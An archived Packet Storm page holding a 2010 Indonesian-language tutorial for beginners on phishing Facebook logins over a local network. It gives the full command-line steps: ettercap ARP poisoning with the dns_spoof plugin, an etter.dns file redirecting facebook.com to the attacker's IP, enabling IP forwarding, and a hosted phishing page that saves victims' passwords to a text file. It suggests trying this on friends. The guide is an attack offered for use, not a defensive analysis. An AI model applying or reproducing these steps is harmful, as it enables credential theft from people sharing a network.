exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Implementasi Pishing Dengan Teknik DNS Spoofing

Implementasi Pishing Dengan Teknik DNS Spoofing
Posted Aug 27, 2010
Authored by yur4kh4

Whitepaper called Implementasi Pishing Dengan Teknik DNS Spoofing. Written in Indonesian.

tags | paper, spoof
SHA-256 | 1e542251279a6b4a24bcf58aa4023c7221ad3105f592888850ed2717c07416e1

Implementasi Pishing Dengan Teknik DNS Spoofing

Change Mirror Download
 _                              _  _   _    _     _  _   
| |__ _ _ _ _ _ _ _ __| || | | | _| |__ | || |
| '_ \| | | | | | | | | | | '__| || |_| |/ / '_ \| || |_
| |_) | |_| | | |_| | |_| | | |__ _| <| | | |__ _|
|_.__/ \__, | \__, |\__,_|_| |_| |_|\_\_| |_| |_|
|___/ |___/ ,.Indonesian Hakers.,
========================================================================================================================================================
------------------------------------------------------------------/
[~] Title : Implementasi Pishing Dengan Teknik DNS Spoffing
[~] Date : 26-08-2010
[~] Author : yur4kh4
[~] Contact : yur4kh4[at]yahoo[d0t]com
[~] Web : http://www.devirakhjib.co.cc/
[~] Language : Indonesian
[~] Tested 0n : ubuntu 10.4 (lucid)
------------------------------------------------------------------/
[*] berpatah-patah Kata
tulisan ini di khususkan untuk para newbie
di kemas dengan sedikit bahasa 4la4y..ahahaha..namun tetap menjunjung tinggi ide0logi ketampanan...wekzz.,.,
mohon maav sy sampai kan di awal tulisan,,karena sy sadar sangat banyak sekali kekurangan dalam tulisan ini...
kekurangan itu tidak lepas dari keterbatasan,,,ilmu pengetahuan sy,,..& kehendak yang maha kuasa.,.:p

[@] Persiapan
implementasi pishing dengan teknik DNS spoffing..
teknik lama namun masih cukup ampuh untuk mengelabui client-client yang ada satu jaringan dengan kita..:P


yang perlu kita siapkan..
1. apache server <sudo apt-get install apache2>
2. php <sudo apt-get install php5>
3. ettercap <sudo apt-get install ettercap>
4. script pishing <cari di google or buat sendiri..or conntact sy...whatever do U want wes...:D>
5. mental yg kuat & sedang tidak dalam keadaan mabuk.akakakaka.,.

sy anggap semua peralatan sudah di install..
cek apache2 yg di install tadi, ketik "localhost" pada web browser ente yang ganteng2.,.:D
klo ada tulisan "its works" <<tandanya installasi berlangsung mulus....yeess,,,
file index default dari server apache ada di /var/www
klo ga percaya cek saja...:D
yur4@localhost /var/www $ ls
index.html
tuch kan...cb buka file index nya...:p..wekz.,.bener kan kata sy...:p
wokey...cukup main-mainnya...

[@] configure

konfigurasi ettercap <ini paling penting>
tempat konfigurasinya ada di /etc/etter.conf
yur4@localhost $ sudo gedit /etc/etter.conf
maka akan membuka file etter.conf dengan menggunakan gedit..
selanjutnya cari
#---------------
# Linux
#---------------

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

hilangkan tanda pagarnya..sehingga menjadi sepert ini
#---------------
# Linux
#---------------

# if you use ipchains:
redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

penghilangan tanda "#" sama dengan pembebasan/meng-aktivkan...script
kalo sudah save...& jangan di ingat-ingat lagi...ahahahaa
selanjutnya..
rubah file etter.dns yang terdapat di /usr/share/ettercap
yur4@localhost $ gedit /usr/share/ettercap/etter.dns
delete isi etter.dns defaultnya & ganti menjadi seperti ini
============================cut here=============================
facebook.com A 10.10.10.6
*.facebook.com A 10.10.10.6
www.facebook.com PTR 10.10.10.6 # Wildcards in PTR are not allowed
============================cut here=============================
sedikit penjelasan
facebook.com = site yang akan kita pishing
10.10.10.6 = IP attacker
NB:
untuk melihat ip
yur4@localhost $ ifconfig
kemudian save...

selanjutnya...copy file-file pishing kita k /var/www
biasanya ada 3 file..index.php terserah.txt logs.php
sebelumnya di hapus aja dulu index.html defaultnya y...
beri perintah gini di file terserah.txt agar bisa di eksekusi..
root@localhost /var/www $ touch terserah.txt
root@localhost /var/www $ chmod 777 terserah.txt
wokeyy...saya anggap sudah di copy y...

[@] eksekusi

next...buka ettercap ente..
sekedar berbagi pengalaman sajjha..klo sy lebih suka membuka ettercap menggunakan mode console...:D

yur4@localhost $ sudo ettercap -C=mode/ -i=intercafe <nama network card>
-C bisa di ganti dengan -G=mode gui -T=mode text..
misal :
yur4@localhost $ ettercap -C -i eth0

sy akan melakukan sniffing pada network card LAN (local area network)
di sesuaikan sajjha dengan network card yg activ di leppy or PC ente..
next...
pilih tab "sniff" >> unified sniffing >>pilih network card yg aktiv...[enter]
selanjutnya pada tab "host">>scan host....
kemudia berangkat k tab "plugins">> manage the plugins
aktivkan autoadd & dns_spoff
selanjutnya pada tab "mitm" >>arp poisoning..[centang/enter]
kemudia terakhir ke tab "start">>start sniffing...:)
wew.,rumit dech kyx ych.,.hee...ngga' kq sebenarnya.,.klo dh biasa ga rumit kq..:p
jangan senang dulu haruz ada 1 hal lagi di lakukan...:p
yaitu meng-forward ip / berpura2 menjadi server lach.,.wekzz.,..
langsung sajjha...masuk ke terminal ketikan perintah ini..
yur4@localhost $ sudo nano /proc/sys/net/ipv4/ip_forward
password : masukan password ente..
ganti angka 0 dengan angka 1 kemudian save....(ctrl+x >>y>>enter)

[@] Penutup

sippzzz...tinggal tunggu az dech....:p
lakukan dengan teman anda agar bisa langsung melihat hasilnya...tp kalo ga percaya...
silahkan buka facebook.com
login dech..
seperti biasa password akan tersimpan di terserah.txt
bisa lihat di http://localhost/terserah.txt

tulisan ini sangat susah di mengerti...ahaha..sy yang nuliz az bingung aplgi kalian yang baca.,.:p
klo memang seriuz...conntact saja sy..^_^..tanyakan semua yang belum jelas...
& mudah-mudahan sy bisa jawab yach.,.amin.,.:p

+++++++++++++++++++thankz t0++++++++++++++++++++++++
[&] allah, muhammad, & seluruh pengikutnya...
[!] Malang Cyber Crew - kill-9 - Indonesian coder
[%] Arianom, Tukulesto , marahmerah , kamtiez , vYc0d , xr0b0t
contrex , mboys , Pathloader , rifky , Thunder x c0de, jundab
ibl13z , geni212 , dhomas , kalong666 ,ichal ,tucker ,

&&**akulukasaatkaupergi**&&
+++++++++++++++++++Luv der4+++++++++++++++++++++++++


Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close